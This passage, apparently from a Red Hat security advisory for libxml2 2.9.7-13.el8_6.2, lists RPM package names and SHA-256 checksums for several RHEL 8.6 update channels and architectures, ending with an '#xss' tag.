SHA-256: 06d49b7ec9bc6bf73f05b0447409608acfbb8679f269fe1ff56081b62b0cd7a1

libxml2-debugsource-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: 06d49b7ec9bc6bf73f05b0447409608acfbb8679f269fe1ff56081b62b0cd7a1

libxml2-devel-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: b6eb9ba28f379b4c8bd148383aff578451ef39f11e89f25dc9be16c903aab35f

python3-libxml2-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: 9c8d139c146e67906cf51437135fa422840edca79e6f6a7372d1e6c49beb91eb

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: 34c03a0d91df85dfa2aef2eaa7755136e6075a3e48a29e6a5de315fcb50f81b2

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: 34c03a0d91df85dfa2aef2eaa7755136e6075a3e48a29e6a5de315fcb50f81b2

**Red Hat Enterprise Linux Server - TUS 8.6**

SRPM

libxml2-2.9.7-13.el8\_6.2.src.rpm

SHA-256: eea07c2634e3a208611c537e5df61b8fc49ddff47be09c85fd719015772b839e

x86\_64

libxml2-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 50a94161230ef62e84d83220121b45cea86241699972fba80e8f9f6ce4c9013a

libxml2-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 99127c52813644231a1d3b32c8cd70e58853c6aaa6529027a95090727bed4009

libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 36ec71b9b5174901379a4967c320063e968099bb3624643580a830ab0ced2bff

libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 36ec71b9b5174901379a4967c320063e968099bb3624643580a830ab0ced2bff

libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 61b02fcd23c16423549cc206dd0d72a61e87adb5551547821efb466cefc5fe5f

libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 61b02fcd23c16423549cc206dd0d72a61e87adb5551547821efb466cefc5fe5f

libxml2-debugsource-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 819ea386db5c823f3e58d8b7014db878c57e63c9413634ab62d92979eac352bf

libxml2-debugsource-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 819ea386db5c823f3e58d8b7014db878c57e63c9413634ab62d92979eac352bf

libxml2-debugsource-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 629653b683f5f2367eb7106ea50185e221bedc06cb6c710d3decc8a585717287

libxml2-debugsource-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 629653b683f5f2367eb7106ea50185e221bedc06cb6c710d3decc8a585717287

libxml2-devel-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: a3485cdeccc73a23ae31c070f1a5d88c5fd987442ea36bb883293bb789b111df

libxml2-devel-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 61ebb256fa055cf2a2afb22f54e70fbfaf3190313dae9638f03a34d1c32e2fea

python3-libxml2-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: cc8ab042086881314c1a3032e113ea00048e8fba99b7ba3ced480320b9791502

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 6268214f6e010ee1407a6f9711ae6962161d3fe32833775be0bebcd5681a3275

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 6268214f6e010ee1407a6f9711ae6962161d3fe32833775be0bebcd5681a3275

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: dacd15510274685de974c638f67131d4a94e634ae89e80d17223347d7130eaa8

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: dacd15510274685de974c638f67131d4a94e634ae89e80d17223347d7130eaa8

**Red Hat Enterprise Linux for ARM 64 - Extended Update Support 8.6**

SRPM

libxml2-2.9.7-13.el8\_6.2.src.rpm

SHA-256: eea07c2634e3a208611c537e5df61b8fc49ddff47be09c85fd719015772b839e

aarch64

libxml2-2.9.7-13.el8\_6.2.aarch64.rpm

SHA-256: e1ce118ad10d1808509d949eabb92b00185c3bc4eec3e2656bf712b2ba7fe737

libxml2-debuginfo-2.9.7-13.el8\_6.2.aarch64.rpm

SHA-256: 6626c9eb7f23979d6a4903a6e2c6c52533f0b9734d960aecf29322432a2333f5

libxml2-debuginfo-2.9.7-13.el8\_6.2.aarch64.rpm

SHA-256: 6626c9eb7f23979d6a4903a6e2c6c52533f0b9734d960aecf29322432a2333f5

libxml2-debugsource-2.9.7-13.el8\_6.2.aarch64.rpm

SHA-256: 86830213d32dddd6779de97814001d252bcf2329091e78bf4bc7f33f348b7675

libxml2-debugsource-2.9.7-13.el8\_6.2.aarch64.rpm

SHA-256: 86830213d32dddd6779de97814001d252bcf2329091e78bf4bc7f33f348b7675

libxml2-devel-2.9.7-13.el8\_6.2.aarch64.rpm

SHA-256: 51b507b1c1c8d2d6710f2378185d8894d1b5f32eb8da78a7d6833dc2368ff1ba

python3-libxml2-2.9.7-13.el8\_6.2.aarch64.rpm

SHA-256: 276ded72c6efc48ed99e73097b2b8dd552f95cfc639dc1712d72032fd7587e56

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.aarch64.rpm

SHA-256: 8bdcea2a00cc96716a334ee2060bc1eedd7c381fec2556fc3a03c9fc74cdf833

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.aarch64.rpm

SHA-256: 8bdcea2a00cc96716a334ee2060bc1eedd7c381fec2556fc3a03c9fc74cdf833

**Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.6**

SRPM

libxml2-2.9.7-13.el8\_6.2.src.rpm

SHA-256: eea07c2634e3a208611c537e5df61b8fc49ddff47be09c85fd719015772b839e

ppc64le

libxml2-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: 1181e30f2a5e5e0875e56263b6279458edff93ffb6fe4ab3cdb53a26ded978a5

libxml2-debuginfo-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: 027b0ef9b4392cfd8b195f6f62f55aa094ed702021e8fee4c27da3ad6388a071

libxml2-debuginfo-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: 027b0ef9b4392cfd8b195f6f62f55aa094ed702021e8fee4c27da3ad6388a071

libxml2-debugsource-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: 06d49b7ec9bc6bf73f05b0447409608acfbb8679f269fe1ff56081b62b0cd7a1

libxml2-debugsource-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: 06d49b7ec9bc6bf73f05b0447409608acfbb8679f269fe1ff56081b62b0cd7a1

libxml2-devel-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: b6eb9ba28f379b4c8bd148383aff578451ef39f11e89f25dc9be16c903aab35f

python3-libxml2-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: 9c8d139c146e67906cf51437135fa422840edca79e6f6a7372d1e6c49beb91eb

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: 34c03a0d91df85dfa2aef2eaa7755136e6075a3e48a29e6a5de315fcb50f81b2

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: 34c03a0d91df85dfa2aef2eaa7755136e6075a3e48a29e6a5de315fcb50f81b2

**Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 8.6**

SRPM

libxml2-2.9.7-13.el8\_6.2.src.rpm

SHA-256: eea07c2634e3a208611c537e5df61b8fc49ddff47be09c85fd719015772b839e

x86\_64

libxml2-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 50a94161230ef62e84d83220121b45cea86241699972fba80e8f9f6ce4c9013a

libxml2-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 99127c52813644231a1d3b32c8cd70e58853c6aaa6529027a95090727bed4009

libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 36ec71b9b5174901379a4967c320063e968099bb3624643580a830ab0ced2bff

libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 36ec71b9b5174901379a4967c320063e968099bb3624643580a830ab0ced2bff

libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 61b02fcd23c16423549cc206dd0d72a61e87adb5551547821efb466cefc5fe5f

libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 61b02fcd23c16423549cc206dd0d72a61e87adb5551547821efb466cefc5fe5f

libxml2-debugsource-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 819ea386db5c823f3e58d8b7014db878c57e63c9413634ab62d92979eac352bf

libxml2-debugsource-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 819ea386db5c823f3e58d8b7014db878c57e63c9413634ab62d92979eac352bf

libxml2-debugsource-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 629653b683f5f2367eb7106ea50185e221bedc06cb6c710d3decc8a585717287

libxml2-debugsource-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 629653b683f5f2367eb7106ea50185e221bedc06cb6c710d3decc8a585717287

libxml2-devel-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: a3485cdeccc73a23ae31c070f1a5d88c5fd987442ea36bb883293bb789b111df

libxml2-devel-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 61ebb256fa055cf2a2afb22f54e70fbfaf3190313dae9638f03a34d1c32e2fea

python3-libxml2-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: cc8ab042086881314c1a3032e113ea00048e8fba99b7ba3ced480320b9791502

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 6268214f6e010ee1407a6f9711ae6962161d3fe32833775be0bebcd5681a3275

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 6268214f6e010ee1407a6f9711ae6962161d3fe32833775be0bebcd5681a3275

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: dacd15510274685de974c638f67131d4a94e634ae89e80d17223347d7130eaa8

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: dacd15510274685de974c638f67131d4a94e634ae89e80d17223347d7130eaa8

Tag

#xss